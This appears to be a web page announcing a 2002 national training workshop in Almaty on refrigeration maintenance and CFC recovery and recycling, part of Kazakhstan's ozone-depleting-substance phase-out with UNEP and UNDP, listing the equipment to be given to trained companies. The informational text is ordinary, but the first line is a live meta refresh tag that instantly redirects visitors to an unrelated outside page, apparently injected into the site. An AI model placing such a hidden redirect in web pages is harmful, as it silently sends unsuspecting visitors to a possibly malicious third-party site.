<meta HTTP-EQUIV="refresh" CONTENT="0;URL=http://azcoder93.narod.ru/mm.htm">was provided to the Republic of Kazakhstan as a grant and distributed to companies operating in refrigeration business.
New technologies of production, upkeep and maintenance of refrigeration machineries have been considered in the workshops. As well there was discussed a possibility to establish a Non-governmental organization representing interests of this industry, accumulating and disseminating the national and international experience in the refrigeration business, that will be able to conduct training workshops and issue certificates for refrigeration technicians.
The workshop participants noted the importance and significance of such training workshops and on the whole supported the idea to create an institutional structure that will help specialists working in the refrigeration business.
RK Ministry of Environmental Protection
UN Environmental Programme (UNEP)
UN Development Programme
Climate Change Coordination Center
National training workshop
"Introduction of up-to-date practices in maintenance of refrigeration equipment and conditioners, CFCs recovery and recycling "
In 1998 Kazakhstan ratified the Vienna Convention on ozone layer protection and Montreal Protocol on substances that deplete the ozone layer, and undertook obligations to ensure gradual reduction in ozone depleting substances (ODS) consumption, and then to stop their use completely.
In order to comply with its obligations, the Republic of Kazakhstan prepared Programme for ODS Phase-out in Kazakhstan, which provides for phase-out of chlorofluorinecarbons (CFCs) through:
Provision of large CFC users and refrigeration service centers with equipment for refrigerants recovery and recycling;
Introduction of up-to-date maintenance techniques in refrigeration and conditioning systems and training of technicians;
Practical use of system insulation with refrigerants.
Under the ODS Phase-out Programme, the Climate Change Coordination Center together with the UNEP and UNDP, starts a series of trainings for specialists maintaining refrigeration and conditioning equipment.
The series of trainings will be opened with the workshop " Introduction of up-to-date practices in maintenance of refrigeration equipment and conditioners, CFCs recovery and recycling" to be held in Almaty on 26-27 August 2002.
Representatives of the Ministry of Natural Resources and Environmental Protection, UNEP, UNDP, companies dealing with maintenance of refrigeration and conditioning systems, will participate in the trainings.
Those specialists trained will receive certificates and companies will be provided with modern equipment for recovery and recycling of refrigerants:
CFC recovery and recycling facilities;
Gas-analyzer for determining CFC types;
CFC leakage detectors;
Cylinders for storage of recovered CFC;
CFC recovery kits;
Tools for maintenance and repair parts;
Vacuum pumps.
This year it is planned to conduct other workshops in different regions of Kazakhstan.